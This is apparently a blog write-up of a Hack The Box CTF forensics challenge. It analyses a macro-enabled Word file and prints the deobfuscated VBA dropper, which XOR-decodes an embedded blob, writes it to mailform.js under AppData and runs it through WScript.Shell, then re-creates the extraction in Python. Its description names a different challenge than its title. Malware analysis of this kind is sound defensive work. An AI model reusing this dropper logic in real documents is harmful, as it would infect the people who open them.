| title | seoTitle | seoDescription | datePublished | cuid | slug | cover | tags |
|---|---|---|---|---|---|---|---|
Forensics: Game Invitation |
Hack The Box CFT Cyber Apocalypse 2024 - Forensics: Game Invitation |
Write-up for the Confinement challenge from HTB Cyber Apocalypse 2024. VBA macro analysis and malware deobfuscation. |
Sat Mar 16 2024 10:10:45 GMT+0000 (Coordinated Universal Time) |
clttxgej7000008l936436y4u |
htb-cyber-apocalypse-forensics-game-invitation |
malware, ethical-hacking, ctf-writeup |
In the bustling city of KORP™, where factions vie in The Fray, a mysterious game emerges. As a seasoned faction member, you feel the tension growing by the minute. Whispers spread of a new challenge, piquing both curiosity and wariness. Then, an email arrives: "Join The Fray: Embrace the Challenge." But lurking beneath the excitement is a nagging doubt. Could this invitation hide something more sinister within its innocent attachment?
Type: Forensics
Difficulty: Hard
Event: Hack The Box Cyber Apocalypse 2024: Hacker Royale (ctftime)
%%[support-cta]
Given: single DOCM file.
$ invitation.docm (read-only)
ce9f4c1bd44ff0a9131e63cf4f8c0ce5c1c8e4eb77bffe843a325d08b34eb9bb
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710578173550/297e0350-f9ae-4a3e-9f63-8eca7f459170.png align="center")
DOCM is are macro-enabled Microsoft Word document format. Analysis of this kind of files are in my opinion the most popular tasks whenever forensics category is included in CTF events. I covered two of those in my blog:
So without further ado, let's extract that VBA macro using olevba Python script.
$ olevba invitation.docm
//... (output trimmed for readability)
I will save you reading the origal, obfuscated script.
Public jspath As String
Public appdataPath As String
Function xorString(given_string() As Byte, length As Long) As Boolean
Dim xor_key As Byte
xor_key = 45
For i = 0 To length - 1
given_string(i) = given_string(i) Xor xor_key
xor_key = ((xor_key Xor 99) Xor (i Mod 254))
Next i
xorString = TRUE
End Function
Dim filenumber
Dim file_length As Long
Dim length As Long
file_length = FileLen(ActiveDocument.FullName)
filenumber = FreeFile
Open (ActiveDocument.FullName) For Binary As #filenumber
Dim byteArray() As Byte
ReDim byteArray(file_length)
Get #filenumber, 1, byteArray
Dim convertedToUnicode As String
convertedToUnicode = StrConv(byteArray, vbUnicode)
Dim singeMatch, matches
Dim regexp
Set regexp = CreateObject("vbscript.regexp")
regexp.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
Set matches = regexp.Execute(convertedToUnicode)
Dim indexOfFirstMatch
If matches.Count = 0 Then
GoTo lable1
End If
For Each singleMatch In matches
indexOfFirstMatch = singleMatch.FirstIndex
Exit For
Next
Dim secondByteArray() As Byte
Dim arbitraryLength As Long
arbitraryLength = 13082
ReDim secondByteArray(arbitraryLength)
Get #filenumber, indexOfFirstMatch + 81, secondByteArray
If Not xorString(secondByteArray(), arbitraryLength + 1) Then
GoTo lable1
End If
appdataPath = Environ("appdata") & "\Microsoft\Windows"
Set fileSystemObject = CreateObject("Scripting.FileSystemObject")
If Not fileSystemObject.FolderExists(appdataPath) Then
appdataPath = Environ("appdata")
End If
Set fileSystemObject = Nothing
Dim fileNumber2
fileNumber2 = FreeFile
jspath = appdataPath & "\\" & "mailform.js"
Open (jspath) For Binary As #fileNumber2
Put #fileNumber2, 1, secondByteArray
Close #fileNumber2
Erase secondByteArray
Set shellObject = CreateObject("WScript.Shell")
shellObject.Run """" + jspath + """" + " vF8rdgMHKBrvCoCp0ulm"
ActiveDocument.Save
Exit Sub
lable1:
Close #fileNumber2
ActiveDocument.Save
End If
End Sub-
Read current file (DOCM) binary.
-
Search for the pattern in the binary data.
-
Run custom XORing function over the succeeding 13082 bytes.
-
Resulting binary data is saves as a
mailform.js. -
WScript
mailform.jsis then executed with the argumentvF8rdgMHKBrvCoCp0ulm
I have transcribed the VBA into the Python script to obtain the mailform.js.
#!/usr/bin/python
import re
def xorString(given_string, length):
xor_key = 45
for i in range(length):
given_string[i] = given_string[i] ^ xor_key
xor_key = ((xor_key ^ 99) ^ (i % 254))
return given_string
def main():
with open('invitation.docm', 'rb') as docmFile:
byteArray = bytearray(docmFile.read())
convertedToUnicode = byteArray
pattern = b'sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa'
matches = re.finditer(pattern, convertedToUnicode)
indexOfFirstMatch = None
for singleMatch in matches:
indexOfFirstMatch = singleMatch.start()
break
if indexOfFirstMatch is None:
print('pattern not found')
return
arbitraryLength = 13082
docmFile.seek(indexOfFirstMatch + 80)
secondByteArray = bytearray(docmFile.read(arbitraryLength))
secondByteArray = xorString(secondByteArray, arbitraryLength)
with open("mailform.js", 'wb') as docmFile2:
docmFile2.write(secondByteArray)
if __name__ == "__main__":
main()This resulted in the JS file.
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582039879/d7c16e14-0dfd-4c97-b96f-17882bd3244d.png align="center")
Because it is a JavaScript we can leverage it very carefuly to let the browser decode the code for us and retrieve the next payload. Please do notice that I've marked the hazardous eval(..) function that has to be removed to neutralize the payload. I have replaces it with a console.log(..).
You never want any kind of
evalorInvoke-Expressionslip through.
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582752891/c10521d0-1f18-40b7-9316-3b2912c732d6.png align="center")
More JavaScript to deobfuscate. Unless..
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582863874/461db9ca-4f35-4700-9a22-21dda7aaad64.png align="center")
And after decoding this in CyberChef 🎉
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710582987470/04941aaa-cb4d-4387-8f40-8f45c4308b2b.png align="center")
%%[follow-cta]